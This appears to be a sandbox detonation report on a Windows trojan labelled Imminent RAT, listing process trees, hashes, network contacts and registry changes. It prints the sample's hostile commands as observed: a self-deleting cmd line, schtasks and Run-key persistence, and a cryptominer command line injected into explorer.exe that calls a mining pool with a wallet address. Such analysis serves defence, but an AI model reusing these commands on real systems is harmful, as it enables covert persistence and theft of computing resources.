PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\taskmgr.exe

"C:\Windows\System32\taskmgr.exe"

C:\Windows\SysWOW64\PING.EXE

ping 1.1.1.1 -n 1 -w 1000

C:\Users\Admin\AppData\Local\Temp\31609.exe

"C:\Users\Admin\AppData\Local\Temp\31609.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Users\Admin\AppData\Local\Temp\services64.exe

"C:\Users\Admin\AppData\Local\Temp\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45Z2KUa15GKDWbtk11MXVih9n7GnPVpfzW9jk9FuCar8EidLwFBvMH4EoTAzjt7pue3fRnuGx3Sb5g8p4o4mJr3V6Xqu6Cw --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 chispetes.hopto.org udp
ES 90.71.49.17:888 chispetes.hopto.org tcp
US 8.8.8.8:53 www.iptrackeronline.com udp
US 172.67.74.63:80 www.iptrackeronline.com tcp
US 172.67.74.63:443 www.iptrackeronline.com tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
US 140.82.114.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 199.247.19.116:80 pool.hashvault.pro tcp

Files

memory/1736-54-0x0000000075DA1000-0x0000000075DA3000-memory.dmp

memory/1736-55-0x0000000074290000-0x000000007483B000-memory.dmp

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/1428-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/1988-62-0x0000000000000000-mapping.dmp

memory/1736-64-0x0000000074290000-0x000000007483B000-memory.dmp

memory/876-63-0x0000000000000000-mapping.dmp

memory/472-66-0x0000000000000000-mapping.dmp

memory/1428-67-0x0000000074290000-0x000000007483B000-memory.dmp

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/1428-70-0x0000000000BE6000-0x0000000000BF7000-memory.dmp

memory/1428-71-0x0000000074290000-0x000000007483B000-memory.dmp

memory/1428-72-0x0000000000BE6000-0x0000000000BF7000-memory.dmp

memory/1504-74-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

C:\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

C:\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/1504-77-0x000000013FE60000-0x000000013FE70000-memory.dmp

\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/1504-80-0x0000000000750000-0x000000000075E000-memory.dmp

memory/1744-82-0x0000000000000000-mapping.dmp

memory/1504-81-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

memory/1956-83-0x0000000000000000-mapping.dmp

memory/1176-85-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\services64.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/1176-88-0x000000013F4A0000-0x000000013F4B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

\Users\Admin\AppData\Local\Temp\services64.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

\Users\Admin\AppData\Local\Temp\services64.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/828-92-0x0000000000000000-mapping.dmp

memory/332-93-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

memory/1552-98-0x0000000000000000-mapping.dmp

memory/1552-100-0x000000013F780000-0x000000013F786000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

memory/552-101-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-102-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-104-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-106-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-108-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-110-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-111-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-112-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-114-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-116-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-117-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-118-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-120-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-121-0x000000014030F3F8-mapping.dmp

memory/552-123-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-125-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-124-0x00000000000E0000-0x0000000000100000-memory.dmp

memory/552-126-0x0000000000000000-0x0000000001200000-memory.dmp

memory/552-127-0x0000000000000000-0x0000000001200000-memory.dmp

memory/552-128-0x0000000000000000-0x0000000001200000-memory.dmp

memory/552-129-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-130-0x0000000000000000-0x0000000001200000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-25 13:43

Reported

2022-09-25 13:46

Platform

win10v2004-20220812-en

Max time kernel

152s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

Signatures

Imminent RAT

trojan spyware imminent

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Default Key = "\\Default Folder\\Server.exe" C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Default Key = "C:\\Users\\Admin\\AppData\\Local\\Default Folder\\Server.exe" C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\SysWOW64\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\SysWOW64\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\SysWOW64\Taskmgr.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
